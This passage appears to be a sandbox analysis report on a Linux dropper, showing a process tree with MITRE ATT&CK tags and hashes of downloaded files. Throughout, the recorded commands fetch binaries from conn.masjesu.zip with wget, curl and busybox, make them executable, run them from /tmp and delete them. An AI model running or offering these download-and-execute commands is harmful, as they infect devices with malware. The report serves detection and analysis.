PID:946
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- System Network Configuration Discovery
PID:948
-
-
/bin/chmodchmod 777 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU./0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU2⤵PID:951
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:952
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:955
-
-
/bin/chmodchmod 777 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb./h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu./NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:971
-
-
/bin/chmodchmod 777 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u./IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u2⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS./32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS2⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM./wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM2⤵PID:991
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- System Network Configuration Discovery
PID:992
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:993
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- System Network Configuration Discovery
PID:995
-
-
/bin/chmodchmod 777 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo./UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7./IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb72⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:1010
-
-
/bin/chmodchmod 777 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs./WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- System Network Configuration Discovery
PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- System Network Configuration Discovery
PID:1017
-
-
/bin/chmodchmod 777 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame./X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame2⤵PID:1021
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
16B
MD57689ca8c5bc85cf6b78ef89323d4df6a
SHA1a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA25617dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA51240f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471